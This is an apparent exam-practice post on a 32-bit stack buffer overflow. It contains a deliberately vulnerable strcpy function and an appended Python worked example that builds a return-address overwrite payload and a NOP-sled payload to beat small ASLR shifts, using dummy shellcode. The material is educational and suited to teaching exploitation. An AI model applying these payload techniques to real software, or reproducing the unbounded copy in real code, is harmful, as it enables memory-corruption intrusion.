I am doing an exam practice question. Suppose I have a function like:
#include <string.h>

/* Deliberately vulnerable: strcpy has no bound, so an arg longer than
   31 bytes overwrites whatever sits above buf (saved ebp, return address). */
void func(char* arg)
{
    char buf[32];
    strcpy(buf, arg);
}
command break func:
-buf begins at 0xbffebfb0
-(gdb) x/2wx $ebp
0xbfebfd8: 0xbffec068 0x08048fe1
The machine is 32-bit little endian, with no defenses like ASLR or DEP.
c) You want to run a payload/shellcode that is 24 bytes long. Write the hex bytes that should be copied into the buffer for an overflow exploit. I don't really know how to go about creating buffer overflows.
However, I would want to write in '\x90', but I don't know how much to write and where it lands you.
d) Assume ASLR is enabled, which results in the stack being offset by 0-15 each time it runs. Describe a payload in the form of a Python print statement that will always get the shellcode from part c to execute (assume the stack condition from part c holds when the offset is 0).
I think the print statement would look like the Python below:
from struct import pack   # pack("<I", addr) gives a 4-byte little-endian address
print shellcode + '\bytes filled in' + pack("<I", shellcode_addr) + pack("<I", return_addr)
But I can't do much on part d without knowing part c. I need some help on how I would solve c and d.
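The following is an added worked example, not code from the original post, that turns the gdb numbers above into the two payloads and then checks where the return address would land for each stack shift. It takes buf at 0xbffebfb0 as given and assumes the seven-digit `$ebp` value printed in the post was meant to be 0xbffebfd8 (eight bytes past the end of the 32-byte buffer), so the saved return address sits at 0xbffebfdc, 44 bytes above buf[0]. The 24-byte shellcode is a constructed stand-in (the exam does not supply one), the ASLR shift is assumed to move the frame to higher addresses, and `execute_model` is a toy model of `ret`, not a real CPU. It is Python 3, so the asker's Python 2 `print` becomes `print(payload.hex())`.

```python
"""Stack-smash payloads for the exam scenario: part (c) fixed address, part (d) NOP sled."""
from struct import pack

# Numbers from the question (32-bit x86, little endian, no DEP).
BUF_ADDR = 0xBFFEBFB0            # "buf begins at 0xbffebfb0"
# Assumption: the post's "0xbfebfd8" is read as 0xbffebfd8 (one dropped hex digit).
EBP_ADDR = 0xBFFEBFD8
RET_SLOT = EBP_ADDR + 4          # on x86 the saved eip sits 4 bytes above the saved ebp
DISTANCE = RET_SLOT - BUF_ADDR   # 0x2c = 44 bytes from buf[0] to the return address
NOP = b"\x90"

# Constructed 24-byte stand-in for real shellcode; it only has to be NUL-free here.
SHELLCODE = bytes(range(0xA0, 0xA0 + 24))


def check_nul_free(payload):
    """strcpy stops at the first 0x00, so a payload containing one is silently truncated."""
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


def part_c_payload(shellcode=SHELLCODE):
    """Part (c): shellcode at buf[0], filler up to the saved eip, then a pointer back to buf.

    Layout (offsets in the payload): [0:24] shellcode, [24:44] filler,
    [44:48] new return address = address of buf[0]. Total 48 bytes.
    """
    if len(shellcode) > DISTANCE:
        raise ValueError("shellcode does not fit between buf[0] and the return address")
    filler = b"A" * (DISTANCE - len(shellcode))   # overwrites the rest of buf + saved ebp
    return check_nul_free(shellcode + filler + pack("<I", BUF_ADDR))


def part_d_payload(shellcode=SHELLCODE, max_offset=15):
    """Part (d): put a NOP sled *after* the saved eip and aim at the sled's high end.

    If the whole frame moves up by k bytes (0 <= k <= max_offset), the sled moves
    with it, and the fixed target address still falls inside the sled; execution
    slides through the remaining NOPs into the shellcode. Below the return address
    there are only DISTANCE - 24 = 20 bytes of slack, so the sled goes above it.
    """
    sled_start = RET_SLOT + 4                      # first byte after the return address
    sled = NOP * (max_offset + 1)                  # one NOP per possible shift value
    target = sled_start + max_offset               # last NOP when k == 0, first NOP when k == max_offset
    return check_nul_free(b"A" * DISTANCE + pack("<I", target) + sled + shellcode)


def execute_model(payload, offset, shellcode=SHELLCODE):
    """Toy model of `ret`: copy payload to buf shifted up by `offset` bytes, read the
    overwritten return address, slide over NOPs, and report whether we reach shellcode."""
    base = BUF_ADDR + offset                       # where buf really is on this run
    target = int.from_bytes(payload[DISTANCE:DISTANCE + 4], "little")
    pc = target - base                             # index into the payload the CPU would start at
    while 0 <= pc < len(payload) and payload[pc] == 0x90:
        pc += 1                                    # each NOP advances to the next byte
    if pc < 0 or pc + len(shellcode) > len(payload):
        return False                               # jumped outside the bytes we control
    return payload[pc:pc + len(shellcode)] == shellcode


if __name__ == "__main__":
    print("part c:", part_c_payload().hex())
    print("part d:", part_d_payload().hex())
    print("part c survives shift 1:", execute_model(part_c_payload(), 1))
    print("part d survives shifts 0-15:", all(execute_model(part_d_payload(), k) for k in range(16)))
```

Two caveats the model makes visible: the part (c) payload only works at shift 0, because it hard-codes buf's address, while the sled payload works for every shift from 0 to 15 and fails at 16, exactly the sled length. If the exam's ASLR shifts the stack downwards instead, the target must point at the low end of the sled rather than the high end; the direction is the one assumption that changes the answer.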